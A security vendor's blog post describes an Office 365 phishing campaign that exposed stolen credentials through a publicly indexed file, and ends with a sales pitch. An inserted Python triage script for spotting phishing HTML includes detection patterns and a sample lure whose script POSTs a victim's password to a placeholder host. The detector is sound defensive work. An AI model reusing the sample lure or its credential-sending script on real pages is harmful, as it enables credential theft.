Phishing Campaign

Caleb Boma | January 21st, 2021

 

Threat actors are very intelligent when it comes to infiltrating and phishing, but this doesn’t mean they won’t make mistakes. Researchers at two security firms published a joint report analyzing the threat actors behind a lengthy phishing campaign that left over 1,000 login credentials for Office 365 accounts exposed.

Details of the Phishing Campaign

The phishing campaign has lasted over 6 months and uses multiple sites to host its phishing pages.

The campaign itself was quite successful for the threat actors, as their emails made it past general email protection. Their mistake was in how they stored the results: the stolen credentials were written to a publicly accessible file that Google could index, so anyone could find them with a simple Google search.

Those behind the attack also compromised WordPress servers so they could host the PHP page given to victims of the campaign. Using emails, the threat actors collected login and password information with fake forms. One instance discovered by the security researchers was a Xerox scan within an HTML link.

SpearTip experts recommend against clicking links from senders you don’t know. For those victims who did click the link, it may have been tough to realize the dialog box wasn’t real. JavaScript code runs once the link is clicked and checks that the credentials are valid. The credentials are then sent to the threat actor’s server, with the pop-up dialog box serving as a diversion. The page displays the Microsoft dialog box over an image, with the user’s email address already filled in and the password field open.
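As an added illustration (not code from the researchers' report or from SpearTip), the following Python sketch triages an HTML file received by email for the traits described above: a password field, the recipient's address already filled in, and script that sends data to a remote host. The function names, the sample markup and the `.example` hosts are assumptions constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
SEND_RE = re.compile(r"fetch\(|XMLHttpRequest|\.ajax\(|sendBeacon")

class LureScanner(HTMLParser):
    """Collects password fields, inline script text and URLs from one HTML file."""
    def __init__(self):
        super().__init__()
        self.password_field = False
        self.in_script = False
        self.script = []
        self.urls = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self.in_script = tag == "script"
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_field = True
        if tag in ("script", "form"):  # external script source or form target
            self.urls.add(a.get("src") or a.get("action") or "")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script.append(data)

def triage(html, recipient):
    """Return the lure traits found in an HTML attachment sent to `recipient`."""
    s = LureScanner()
    s.feed(html)
    s.close()
    script = "".join(s.script)
    hosts = {urlparse(u).hostname for u in s.urls | set(URL_RE.findall(script))}
    f = {"password_field": s.password_field,
         "recipient_prefilled": recipient.lower() in html.lower(),
         "script_sends_data": bool(SEND_RE.search(script)),
         "remote_hosts": sorted(h for h in hosts if h)}
    f["suspicious"] = all(f.values())  # every trait present, incl. a remote host
    return f

# Constructed sample, not taken from the campaign; .example hosts are placeholders.
SAMPLE = """<div><input type="email" value="j.doe@victim.example" readonly>
<input type="password" id="pw"><button onclick="go()">Sign in</button></div>
<script>function go(){ fetch("https://collector.example/c.php",
 {method:"POST", body:document.getElementById("pw").value}); }</script>"""
```

A hit on all four traits is a reason to quarantine the message and review the listed hosts, not proof of phishing on its own; obfuscated script would need decoding before these checks apply.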

Be wary of what you’re clicking on and realize these are the types of intrusions where entire networks can be taken down. No organization wants to experience widespread disruption because it can halt operations and diminish brand value. Leave the protection of your data and environment to a trusted firm like SpearTip.

SpearTip’s Security Operations Center (SOC) specializes in preventing malware from entering networks. Our engineers work 24/7 to monitor environments for malicious activity. As threat actors continue to be pervasive, we will remain attentive to their evolution.

If your organization experiences a breach, call our incident response hotline at 833.997.7327.
